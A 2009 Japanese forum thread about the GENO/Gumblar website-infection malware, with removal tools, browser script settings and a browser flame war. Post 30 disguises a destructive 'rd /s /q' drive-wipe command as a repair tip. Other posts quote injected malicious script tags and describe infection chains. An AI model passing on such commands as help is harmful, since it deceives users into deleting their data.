GENOウイルススレ ★ ..
2:名無しさん@お腹いっぱい。
09/12/01 04:02:55
■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください
@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
URLリンク(www.nifty.com)
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
URLリンク(blogs.technet.com)
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
URLリンク(itpro.nikkeibp.co.jp)
■ 旧型GENOウイルスのまとめなど
*** 【注意!】10月からの亜種には無効な情報があります ***
★Anubisレポート
URLリンク(anubis.iseclab.org)
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
【関連スレ】
GENOウイルススレ 感染4台目 - インターネット板
スレリンク(internet板)
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
スレリンク(doujin板)
3:名無しさん@お腹いっぱい。
09/12/01 04:06:02
★過去スレ
GENOウイルススレ
スレリンク(sec板)
GENOウイルススレ ★2
スレリンク(sec板)
GENOウイルススレ ★3
スレリンク(sec板)
GENOウイルススレ ★4
スレリンク(sec板)
GENOウイルススレ ★5
スレリンク(sec板)
GENOウイルススレ ★5
スレリンク(sec板)
GENOウイルススレ ★7
スレリンク(sec板)
GENOウイルススレ ★8
スレリンク(sec板)
GENOウイルススレ ★9
スレリンク(sec板)
GENOウイルススレ ★10
スレリンク(sec板)
GENOウイルススレ ★11
スレリンク(sec板)
4:名無しさん@お腹いっぱい。
09/12/01 04:11:44
★過去スレ
GENOウイルススレ ★12
スレリンク(sec板)
GENOウイルススレ ★13
スレリンク(sec板)
GENOウイルススレ ★14
スレリンク(sec板)
GENOウイルススレ ★15
スレリンク(sec板)
GENOウイルススレ ★16
スレリンク(sec板)
GENOウイルススレ ★17
スレリンク(sec板)
GENOウイルススレ ★18
スレリンク(sec板)
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★19
スレリンク(sec板)
GENOウイルススレ ★20
スレリンク(sec板)
GENOウイルススレ ★21
スレリンク(sec板)
GENOウイルススレ ★22
スレリンク(sec板)
5:名無しさん@お腹いっぱい。
09/12/01 07:30:19
Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
URLリンク(www.forest.impress.co.jp)
URLリンク(hide9999.web.fc2.com)
6:名無しさん@お腹いっぱい。
09/12/01 08:01:54
アプリケーションの脆弱性確認ツール
MyJVN バージョンチェッカ
URLリンク(jvndb.jvn.jp)
Secunia Personal Software Inspector (PSI)
URLリンク(secunia.com)
7:名無しさん@お腹いっぱい。
09/12/01 13:26:03
いちもつ
しかしだな、前スレ(22)以前の物はいらないと思う。
8:名無しさん@お腹いっぱい。
09/12/01 14:01:30
個人情報をさらすマルウェア、Shareを通じて日本で流通
URLリンク(headlines.yahoo.co.jp)
これってエロゲーにsetup.exeを仕込まれてた例のアレ?
晒し会場(現在は404)
URLリンク(p3p.jp)
winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
URLリンク(detail.chiebukuro.yahoo.co.jp)
9:名無しさん@お腹いっぱい。
09/12/01 19:05:54
スレ違いっつーか板違い
ダウソ板でやれ
10:名無しさん@お腹いっぱい。
09/12/02 15:52:57
■ 感染確認・駆除ツール等
アンラボ(v3daonol.exe)
URLリンク(www.ahnlab.co.jp)
マカフィー(stinger.exe)
URLリンク(www.mcafee.com)
Kaspersky(KatesKiller.exe)
URLリンク(support.kaspersky.com)
11:名無しさん@お腹いっぱい。
09/12/03 16:43:07
【誤検出?】avast!報告スレ【Win32:Delf-MZG】
スレリンク(sec板)
これもGENO系なの?
12:名無しさん@お腹いっぱい。
09/12/03 16:44:59
それはただの誤検出
13:名無しさん@お腹いっぱい。
09/12/03 18:03:32
まだまだ猛威を振るってますね。。
URLリンク(www.virustotal.com)
対応済み:AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応:Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他
14:名無しさん@お腹いっぱい。
09/12/03 18:08:06
Shareの奴だろ。関係ないからダウソ板に帰れって。
15:名無しさん@お腹いっぱい。
09/12/03 18:14:05
>>14
これGumblar.x 系らしいよ。
16:名無しさん@お腹いっぱい。
09/12/03 18:22:29
デタラメもいい加減にしろよ。
> Symantec 1.4.4.12 2009.12.03 Infostealer.Kenzero
Illegal Games? Pay the Price?Publicly!
URLリンク(www.symantec.com)
Infostealer.Kenzero primarily arrives in the guise of setup.exe,
which in this case is a fake installation file for Japanese pornographic games
that are circulating around the file-sharing network “Share.”
Several pornographic games have been reported to include this malicious setup.exe file.
17:名無しさん@お腹いっぱい。
09/12/03 19:11:20
____
/ \
/ _ノ ヽ、_ \
/ o゚((●)) ((●))゚o \ ほんとはShareでエロゲを違法ダウンロードしたんだお…
| (__人__)' |
\ `⌒´ /
____
/ \
/ _ノ ヽ、_ \
/ o゚⌒ ⌒゚o \ でも恥ずかしくて言えないお…
| (__人__) |
\ ` ⌒´ /
____
/⌒ ⌒\
/( ●) (●)\
/::::::⌒(__人__)⌒::::: \ だからGENOのせいにするお!
| |r┬-| |
\ `ー'´ /
18:名無しさん@お腹いっぱい。
09/12/05 02:03:17
Win7でも感染報告があったらしいけど、それでもVistaだけは安全なの?
19:名無しさん@お腹いっぱい。
09/12/05 02:06:59
知らないけど報告は間違ってる場合もあるからな
以前も感染するわけ無いのに報告あったから
20:名無しさん@お腹いっぱい。
09/12/05 02:09:19
ちょっと知識がある人は感染しない
感染したと言ってる人は本当かどうかは別として知識がない
だから報告も信憑性がない
21:名無しさん@お腹いっぱい。
09/12/05 07:21:36
とりあえず前スレ埋めてこようぜ
22:名無しさん@お腹いっぱい。
09/12/05 12:11:38
AdobeがFlash Playerのアップデートを予告、Illustratorには脆弱性発覚
スレリンク(news板)
23:名無しさん@お腹いっぱい。
09/12/05 12:47:38
Vistaや7で感染したって人はUAC切ってたんだろ
24:名無しさん@お腹いっぱい。
09/12/05 13:26:35
以前のGENOはバージョンチェックしてたからUACは関係ない
それでも感染したとか言う人がいた
25:名無しさん@お腹いっぱい。
09/12/05 16:03:40
URLリンク(jp.trendmicro.com)
先月4位から1位に浮上したのは、感染コンピュータのユーザ情報や
FTPサーバへのログイン名とパスワードを盗み出そうとする「TSPY_KATES(カテス)」です。
「TSPY_KATES」は、「JS_GUMBLER(ガンブラー)」や「JS_IFRAME(アイフレーム)」によって
改ざんされた正規のWebサイトから、リダイレクトされる不正なWebサイトより感染することが確認されています。
URLリンク(www.viruslist.com)
URLリンク(www.viruslist.com)
感染 日本7位
リダイレクタ 日本6位
26:名無しさん@お腹いっぱい。
09/12/05 20:06:53
さすがエロサイト動画サイト大好き日本人
27:名無しさん@お腹いっぱい。
09/12/06 01:24:11
gred AntiVirus アクセラレータ
スレリンク(sec板)
28:名無しさん@お腹いっぱい。
09/12/06 10:42:39
「2009.11.06 日曜日」
URLリンク(www3.atword.jp)
gnomeさん・・・時計が1ヶ月ずr(ry
29:名無しさん@お腹いっぱい。
09/12/06 14:22:19
画面が真っ黒になるわけじゃないけどポインタだけになって何もできない
もちろんセーフモードでも起動できない
でも5回くらいやってるとまた何事もなかったかのように起動する
30:名無しさん@お腹いっぱい。
09/12/06 15:33:50
>>29
ウイルス感染?それともハード関連の不具合かな?
OS他PCスペック等が判らないからなんとも言えないが、
簡易検出の「チェックディスクコマンド」を試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
31:名無しさん@お腹いっぱい。
09/12/06 17:56:49
ありがとう。すっぱり綺麗になった。
32:名無しさん@お腹いっぱい。
09/12/06 23:12:01
誰もひっかからないとは思うが一応書いとく
>30を実行するとフォルダが全部削除されるから気をつけろ
とりあえず通報しといた
33:名無しさん@お腹いっぱい。
09/12/07 01:36:36
>>32
アドバイスありがとう。
だが大丈夫だ。今時のゆとりは(俺含め)、
こんなコマンドなんざ面倒くさがっていちいち打ったりしない。
34:名無しさん@お腹いっぱい。
09/12/07 01:41:17
前スレ埋めてきた。 ついでに新型の情報を転載っと。
--
962 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43
Trojan-Downloader.JS.Gumblar.x 確認
www●jwell●com
963 :名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10
jsに突っ込まれてるね。
/js/font.js
/js/base.js
/inc/prog.js
35:名無しさん@お腹いっぱい。
09/12/08 08:25:27
結局フラッシュだかadobe等更新しとけばいいだけ
36:名無しさん@お腹いっぱい。
09/12/08 08:27:12
だか、等
とか言われるとスゲー不安
37:名無しさん@お腹いっぱい。
09/12/08 08:33:43
日常使うソフトなんか限られるわけだから
全部最新版にしておけばいい
スクリプト防いだ!スゴイ!よりは効果があるわ
38:名無しさん@お腹いっぱい。
09/12/08 08:35:59
日本語でおk
39:名無しさん@お腹いっぱい。
09/12/08 08:38:34
こんなスレでまじになっちゃってどうするの
40:名無しさん@お腹いっぱい。
09/12/08 08:40:03
IE使うなとか馬鹿か
MACウイルス無いとか威張ってるのと同じだな
41:名無しさん@お腹いっぱい。
09/12/08 08:47:07
unDonutとTheworldとIE7を使い分けてるぜ
42:名無しさん@お腹いっぱい。
09/12/08 09:26:47
Windows使わなければ何も怖いことはない。
43:名無しさん@お腹いっぱい。
09/12/08 09:33:13
パソコン使わなければいいじゃん。
44:名無しさん@お腹いっぱい。
09/12/08 10:28:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
45:名無しさん@お腹いっぱい。
09/12/08 10:39:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
他人に強制するほどの根拠があるかね
Windows使うの辞めろよ
使い勝手はIEコンポブラウザならかわらんし
46:名無しさん@お腹いっぱい。
09/12/08 10:42:38
ここまで全部俺
47:名無しさん@お腹いっぱい。
09/12/08 10:46:48
Firefox使いだがNoScriptはいろいろな意味で嫌い。
48:名無しさん@お腹いっぱい。
09/12/08 12:19:56
ここまでScript
49:名無しさん@お腹いっぱい。
09/12/08 12:46:17
火狐野郎が
50:名無しさん@お腹いっぱい。
09/12/08 12:50:17
こんにちはGoogleです
51:名無しさん@お腹いっぱい。
09/12/08 12:51:55
Firefoxつかいが頭おかしい事がまたあかるみになったのか
52:名無しさん@お腹いっぱい。
09/12/08 13:11:47
オープンソースがすごい?
リナックスでも使ってろ糞狐
53:名無しさん@お腹いっぱい。
09/12/08 18:35:26
Windows使ってんだからIE使うのが普通だしな
54:名無しさん@お腹いっぱい。
09/12/08 18:39:30
保守おつかれさまです
55:名無しさん@お腹いっぱい。
09/12/08 18:41:08
なあに馬鹿なの
56:名無しさん@お腹いっぱい。
09/12/08 18:42:50
何使おうが自由だ
押し付けがましいんだよ
Firefox厨
57:名無しさん@お腹いっぱい。
09/12/08 18:44:49
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
よく分からない奴がそんなモン使うわけねえだろきめえ
58:名無しさん@お腹いっぱい。
09/12/08 18:45:37
この子なんでこんなに必死なの
59:名無しさん@お腹いっぱい。
09/12/08 18:47:26
必死だなこんな糞スレで
60:名無しさん@お腹いっぱい。
09/12/08 18:47:32
すごいね
一人で何回も書き込んじゃってw
61:名無しさん@お腹いっぱい。
09/12/08 18:48:26
Firefox使えとかうぜえ
62:名無しさん@お腹いっぱい。
09/12/08 18:49:16
俺の自演だけど毎回茶々いれてくる馬鹿暇人が混じるから迷惑だ
63:名無しさん@お腹いっぱい。
09/12/08 18:51:19
どっかの誰かが作ってちょっと突っ込まれたらすぐいじるような糞アドオンつかうのなら
IEでスクリプト全オフでブラウジングしたほうがまし
64:名無しさん@お腹いっぱい。
09/12/08 18:55:49
GENO対策なんか更新しとけばオワリ
スレ伸ばすにはにはNoScriptがいいとか書いてテンプレwいじれば
ブラウザ戦争が勃発
65:名無しさん@お腹いっぱい。
09/12/08 19:07:27
FirefoxだけプラグインのNoscript使えとか書いて
他のやる気なさすげえ
66:名無しさん@お腹いっぱい。
09/12/08 19:35:41
糞チェッカーは糞
67:名無しさん@お腹いっぱい。
09/12/09 15:36:17
Flash Playerの最新バージョン公開、深刻な脆弱性を修正
URLリンク(internet.watch.impress.co.jp)
68:名無しさん@お腹いっぱい。
09/12/09 15:59:32
NoScriptなんかでいばるより更新しとけってこと
69:名無しさん@お腹いっぱい。
09/12/09 16:31:01
10,0,32,18からかわんねえぞ
70:名無しさん@お腹いっぱい。
09/12/09 18:17:03
一回アンインスコしないと
71:名無しさん@お腹いっぱい。
09/12/09 18:19:42
firefox/opera版はプラグイン形式で簡単だからいいね
いつも、普通にコントロールパネルから通常アンインストール→最新版をインストールでやってる
IEはエンジン部分だけ2chブラウザで利用しているが完全放置
flashも入れていない
72:名無しさん@お腹いっぱい。
09/12/09 18:29:46
しらねえよカス
73:名無しさん@お腹いっぱい。
09/12/09 18:30:58
火狐野郎はなにかにつけてどうでもいいことにケチつけるな
74:名無しさん@お腹いっぱい。
09/12/09 18:31:30
Adobe Flash Player のバージョンテスト
URLリンク(www.adobe.com)
(各ブラウザで確認すること)
インスコ時のバージョン○○がインスコされましたってのは
Adobeの中の人の手打ちなので信用すんな
75:名無しさん@お腹いっぱい。
09/12/09 18:33:08
アンインストールする必要ないな別に
76:名無しさん@お腹いっぱい。
09/12/09 18:39:56
IEも他のも自動で変わるからアンインスコとかいらんね
77:名無しさん@お腹いっぱい。
09/12/09 18:43:10
またIEアンチが頭おかしい理屈こねたのか
78:名無しさん@お腹いっぱい。
09/12/09 18:44:19
このスレ☆10ぐらいから500レスは俺だな
79:名無しさん@お腹いっぱい。
09/12/09 21:33:05
>>71
>>5
80:名無しさん@お腹いっぱい。
09/12/10 12:27:45
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
81:名無しさん@お腹いっぱい。
09/12/10 13:25:33
>>80
IE(笑)は、スクリプト以前にActiveXがうんこ
82:名無しさん@お腹いっぱい。
09/12/10 13:29:39
Netscape(笑)Pluginほどでは(笑)
83:名無しさん@お腹いっぱい。
09/12/10 13:34:56
糞火狐がまたGENOと関係ないこといってら
84:名無しさん@お腹いっぱい。
09/12/10 13:36:10
火狐野郎がNoScript宣伝したかっただけ
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
85:名無しさん@お腹いっぱい。
09/12/10 13:40:16
いまだActiveXが危険とかいってんのか
どんだけー
86:名無しさん@お腹いっぱい。
09/12/10 13:42:10
自分で撃ってくれと弾が入った鉄砲を渡したあほ
鉄砲が危険だから死んだと遺族が訴えた
87:名無しさん@お腹いっぱい。
09/12/10 13:47:15
オープンソースがすごい?
リナックスでも使ってろ
88:名無しさん@お腹いっぱい。
09/12/10 13:48:29
とにかく
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
89:名無しさん@お腹いっぱい。
09/12/10 13:52:07
>>57
まったくその通りです。
むしろよくわからない人は「NoScript」を導入しないで下さいだと思う。
ここはブラウザの優劣を競うすれじゃないんだし、並列に扱えばいいじゃない。
■ブラウザでスクリプト使用を基本無効に設定
ここに>>84さんの言うIEの設定方法を書き加えて
これを削除する
↓↓↓
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の
用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
90:名無しさん@お腹いっぱい。
09/12/10 13:54:03
■ブラウザでスクリプト使用を基本無効に設定
このくだりは全部いらねえよ
更新だけしとけばいい
91:名無しさん@お腹いっぱい。
09/12/10 14:07:23
ツール(T) -> インターネットオプション(O) -> 「セキュリティ」タブ ->
「レベルのカスタマイズ」ボタン -> 「スクリプト」 の「アクティブスクリプト」で「無効にする」を選択。
でjavascript無効
セキュリティのインターネットのゾーンを基本全部無効にして
信頼済みサイトに追加していけばいいだろう
noscriptとか使うのと同じ感じになる
IEコンポ系ではワンタッチで有効無効を切り替えられるのもある
まあスクリプト使用!危険
そんなヒステリーにつきあってられるかってのが実際だ
92:名無しさん@お腹いっぱい。
09/12/10 14:21:29
糞チェッカーはうんこ
93:名無しさん@お腹いっぱい。
09/12/10 14:35:13
>89
荒らしに構うな
94:名無しさん@お腹いっぱい。
09/12/10 14:36:22
>>信頼済みサイトに追加していけばいいだろう
これが大変なんだけどね…
95:名無しさん@お腹いっぱい。
09/12/10 14:37:50
真するー出来ないやつがきたな
96:名無しさん@お腹いっぱい。
09/12/10 14:41:12
すくりぷと使用しないとか強い意志があるならそれでいいだろ
NoScriptなら簡単に追加できる!!馬鹿かと
97:名無しさん@お腹いっぱい。
09/12/10 14:48:00
>>1-96
ここまでNoScriptをスルーできない人でお送りしました。
98:名無しさん@お腹いっぱい。
09/12/10 14:50:34
>>97
スルー
99:名無しさん@お腹いっぱい。
09/12/10 14:51:49
89と97は俺じゃない
100:名無しさん@お腹いっぱい。
09/12/10 15:18:48
むしろIE版noscriptつくれ
101:名無しさん@お腹いっぱい。
09/12/10 17:38:23
URLリンク(www3.atword.jp)
【Zlkon, Gumblar 問題に関して】
>Firefox+NoScriptの使用を検討してください。
g'nomeさんが推奨してるから良いんでね?
NoScriptの設定で<IFRAME>を禁止にしておけば、
IFRAMEインジェクションも阻止れるし。
IFRAME=うざい広告、アクセス解析、webビーーー〜・・・(ry
102:名無しさん@お腹いっぱい。
09/12/10 18:56:28
g'nomeさんて誰だよ
そんなやつがどうだろうが知るかぼけが
103:名無しさん@お腹いっぱい。
09/12/10 18:58:29
また火狐野朗が他の関係ないこといいだしたのか
104:名無しさん@お腹いっぱい。
09/12/10 19:04:09
>>NoScriptの設定で<IFRAME>を禁止にしておけば…
NoScriptしかしらんのか
105:名無しさん@お腹いっぱい。
09/12/10 19:06:55
何使おうが自由だ
押し付けがましいんだよ
Firefox厨
106:名無しさん@お腹いっぱい。
09/12/10 19:13:01
IEでの対処方書いて
テンプレ新しく作れよ
107:名無しさん@お腹いっぱい。
09/12/10 19:15:21
■ブラウザでスクリプト使用を基本無効に設定
の項目より下はいらん
108:名無しさん@お腹いっぱい。
09/12/10 19:19:02
Windows以外のOSの使用を検討してください。
て書けよ
109:名無しさん@お腹いっぱい。
09/12/10 19:23:14
>>102-107
一人で連投して必死だなw
おまい、MSの社員だろ?
110:名無しさん@お腹いっぱい。
09/12/10 19:24:32
■ブラウザでスクリプト使用を基本無効に設定
InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
(ブラウザ再起動をしないと適用されない)
Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
切り替え可能になるのでいざという時便利
111:名無しさん@お腹いっぱい。
09/12/10 19:29:45
(ブラウザ再起動をしないと適用されない)なんてのは嘘だね
112:名無しさん@お腹いっぱい。
09/12/10 19:31:42
■ブラウザでスクリプト使用を基本無効に設定
・InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
・Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
・safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
・Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
・Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
・Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです
また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で
切り替え可能になるのでいざという時便利
・Google Chrome -disable-javascriptで起動。
113:名無しさん@お腹いっぱい。
09/12/10 19:33:21
MSの社員じゃないあんたはさっさとWindowsなんぞ使うのやめたら
はるかに安全で使いやすいらしいぞ
114:名無しさん@お腹いっぱい。
09/12/10 19:48:47
Macとか
115:名無しさん@お腹いっぱい。
09/12/10 19:51:15
WebBoyでも使ってろ
116:名無しさん@お腹いっぱい。
09/12/10 20:25:07
g'nomeのとこ、ここではあんま話題にすんな。いろいろあったんだから・・・
自分が参考にする分にはご自由にどうぞ
117:名無しさん@お腹いっぱい。
09/12/10 20:27:30
またそんな釣りレスして
118:名無しさん@お腹いっぱい。
09/12/10 21:38:10
なんか面倒くせえな、もう携帯で見るわ
119:名無しさん@お腹いっぱい。
09/12/10 23:11:12
そこまでしてNoScript否定したいのは何故だ?
アフィで稼いでいる奴が必死になってんのか?
120:名無しさん@お腹いっぱい。
09/12/10 23:36:22
いつもの保守ツールくんだから気にしなくていいよ
121:名無しさん@お腹いっぱい。
09/12/10 23:42:39
アフィやってるヤツならAdblock Plusが敵だろ
サードパーティのスクリプトやオブジェクト全部読み込まないとか出来るけど
NoScriptやRequestPolicyほど融通きかんがな
122:名無しさん@お腹いっぱい。
09/12/10 23:44:11
今回FlashPlayer9の更新もあったのな
もう無いのかと思ってたぜ
123:名無しさん@お腹いっぱい。
09/12/11 08:35:27
NoScript否定したい?
糞火狐が他否定してるんだろカスが
124:名無しさん@お腹いっぱい。
09/12/11 08:46:52
必死こいてテンプレ変えた奴がよくいう
125:名無しさん@お腹いっぱい。
09/12/11 09:07:43
fox房はよくおしつける
使いやすさは人それぞれだし
セキュリティなんぞ努力のおかげでシェアあがって危険ブラウザ
破綻まみれのセールストーク聞き飽きた
126:名無しさん@お腹いっぱい。
09/12/11 09:08:46
話が長いな
その話はもういいよ
127:名無しさん@お腹いっぱい。
09/12/11 09:11:56
はやく900までいかなあかんもんねえ(笑)
1が削除依頼出して建てなおすならともかく
128:名無しさん@お腹いっぱい。
09/12/11 12:09:04
IE(核爆笑)
129:名無しさん@お腹いっぱい。
09/12/11 12:15:34
また召還呪文唱えてるのか火狐
130:名無しさん@お腹いっぱい。
09/12/11 12:16:34
Windows(核爆笑)
131:名無しさん@お腹いっぱい。
09/12/11 17:39:09
Gumblarご乱心?
URLリンク(www)<)●co●in/images/favicon●php ></script>
↑
色々な場所に沢山入ってるんだが・・・
132:名無しさん@お腹いっぱい。
09/12/11 17:48:07
なにそれこわい
133:名無しさん@お腹いっぱい。
09/12/11 17:49:17
www●senbaskasin●net/ms_word●asp?haber=246
「ファイルタイプ: Microsoft Word」
こんなのも引っ掛かるようになってきた
134:名無しさん@お腹いっぱい。
09/12/11 19:39:33
>>131
自動で突っ込むタイプだとよくある。
135:名無しさん@お腹いっぱい。
09/12/12 02:50:48
旅行関係(代理店?)のHP陥落を複数確認。
webtravel●co●jp ※問い合わせページのみ?
URLリンク(www.google.com)
usa-sports●net
URLリンク(www.google.com)
某空港の巻き込みを喰らったと思われる。
※上記以外にもあるような気がするが、調べる時間が無〜 orz
136:名無しさん@お腹いっぱい。
09/12/13 05:14:50
ビスタだけどジェノに感染したかも・・・
デスクトップ画面がブラックスクリーン(セーフモードでの起動は可能
これもうクリーンインストールしか手は無いの?
それ以外の回復手段あったら教えてくれ・・・
137:名無しさん@お腹いっぱい。
09/12/13 05:26:05
>>136
クリーンインストール推奨だが・・・ >>10 でどう?
念のためすべてのツールを試してみるとか
138:名無しさん@お腹いっぱい。
09/12/13 05:29:46
トロイの木馬『Buzus』、感染サイトは12万5000以上に
11月下旬に始まった極めて複雑な新型 SQL インジェクション攻撃により、
すでに12万5000以上の Web サイトが、クレジットカード情報や銀行口座などの
情報を収集することで知られるトロイの木馬『Buzus』に感染している。
インターネットのセキュリティおよび監視を手がける企業 ScanSafe によると、
この攻撃はまず、埋め込まれた iframe が「318x.com」というサイトから
第1段階の悪質なコードを読み込むのだという。
その後、ユーザーからは見えない一連の iframe およびコードリダイレクションが、
「windowssp.7766.org」サイトから問題のあるコード「Backdoor.Win32.Buzus.croo」を
密かにインストールして完了する。
URLリンク(japan.internet.com)
139:名無しさん@お腹いっぱい。
09/12/13 06:50:40
>>136 vistaで何やって感染したんだ?
140:名無しさん@お腹いっぱい。
09/12/13 07:30:31
URLリンク(www.forest.impress.co.jp)
141:名無しさん@お腹いっぱい。
09/12/13 12:42:12
政治板でN速+その他を生暖かく見守るスレ 90
スレリンク(seiji板)
142:名無しさん@お腹いっぱい。
09/12/13 17:17:09
uac切ってたんじゃね?
143:名無しさん@お腹いっぱい。
09/12/13 17:50:27
新型によるUACスルーが噂されているがどれも明確なソースがないんだよね
144:名無しさん@お腹いっぱい。
09/12/13 18:07:51
URLリンク(q1w2e3.sakura.ne.jp)
145:名無しさん@お腹いっぱい。
09/12/13 18:47:10
>>143 確かに調べても見つからないね
対象なるとしたら7の方だろうね
ユーザー数適にw
146:名無しさん@お腹いっぱい。
09/12/13 22:48:29
URLリンク(rd.rakuten.co.jp)
これだけ、なぜかnoscriptのXSS遮断が働いたんだけど誤爆?
147:名無しさん@お腹いっぱい。
09/12/14 01:43:09
>>138
<div class="pic_content">
<img src="/XXXXX/XXXX/XXXXX/XX/XXXXX●<script src=URLリンク(7o8)●net></script>
a href、imgとかにも寄生してるから
148:名無しさん@お腹いっぱい。
09/12/14 18:54:20
相談させて欲しい。
カスペさんが、とあるサイトで反応したのでソースを確認したら
<scipt sc=htt//apiwachara.com/images/gifimg.php ></script><body>
というものが入っていた。
ほぼ黒だと思ったので管理人に連絡。
旧GENOの対処だとだめなこと、ウィルスソフトもダメなこと、
カスペインストかニフティのオンラインスキャン等の手段があること、
レジストリ確認(URLリンク(xx2zz.blog77.fc2.com))法があることをメールに記載。
インデックスのみのこしてサイトを削除してくれたが、
・覚えのないタグが入っていた
・削除した
・PCに感染はみとめられない
・感染したわけではないが、念のため
との記載。
その告知ページに上記タグが埋め込まれてるあたりもうどうしたら。
GENOウィルスチェッカーみたいなものが反応してくれたら、信じてもらえるかもと思って
URLリンク(6130.web.fc2.com)
で確認してみたんだけど、「安全です」との結果が出てくる。
新しく作ったHTMLに寄生されている以上、黒で間違いないと思うんだけど、
簡単にわかってもらえる方法はないだろうか?
149:名無しさん@お腹いっぱい。
09/12/14 19:39:02
>>148
前スレより引用。
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/01(日) 23:53:21
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
150:名無しさん@お腹いっぱい。
09/12/14 19:46:44
>>148
レジストリによる確認方法は隠蔽されるので、役に立たないと前スレで報告あり
リンク先にもそう記載されているので熟読すること
一応 >>10 の検知駆除ツールを紹介するがどこまで亜種に通用するかは分からない
そもそも感染していないPCからサイトのパスワードの変更をしないと何度でもスクリプトを挿入される
とりあえずSo-netのセキュリティ通信あたりでも管理人に見てもらって理解してもらうくらいか
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
>>149 の通り、管理人に知識がないと、まともな答えは返ってこないので無理かも
151:148
09/12/14 21:04:11
>>149
わざわざひっぱってきてくれてありがとう。真理だな。
もう一回メールして理解してもらえないようならそうするわ。
>>150
レジストリの隠蔽もするとは…自分もよくよく読んでいなかった。指摘ありがとう。
教えてもらったことをふまえてもう一回メール送って説得してみるよ。
152:名無しさん@お腹いっぱい。
09/12/14 21:21:43
>>151
ああそうだ
そのサイトの名前かURLでググってみると↓こういうの出ないかな
「このサイトはコンピュータに損害を与える可能性があります。」
出るようなら危険なサイトと認識されているわけだから
Googleの知名度で説得の材料になるかも・・・
153:名無しさん@お腹いっぱい。
09/12/14 22:07:22
GENOウイルスチェッカーは使えないからaguse gwならいけるんじゃねと
思って試したけどダメだった
カスペはちゃんと反応するみたいだけどなあ
URLリンク(www.virustotal.com)
もしかしたら本人以外のPCが感染してるかも
154:名無しさん@お腹いっぱい。
09/12/14 22:45:02
google先生からゴルァしてもらいたいなら、
↓ここから該当のサイトURLを報告するよろし。
URLリンク(www.google.com)
155:名無しさん@お腹いっぱい。
09/12/14 23:20:48
カスペはゲノには容赦ないな。
156:148
09/12/15 00:23:26
おおお、一通り勉強しなおしてもどってきたら、さらにアドバイスが。
ありがとう!グーグル先生にも問い合わせてみるよ。
>>153
アドレス記入だとエラーが起こるんだけど、
ひょっとしてわざわざ148のウィルスをDLして確認してくれた?
もしそうなら、ほんとありがとう。
そうでない場合は、是非やりかた教えてください。
157:名無しさん@お腹いっぱい。
09/12/15 01:05:50
>>156
本体はわからんけど攻撃スクリプトだけもらった
アドレス記入ってどういうこと?
直接ブラウザで見に行くのはやめといたほうがいいよ
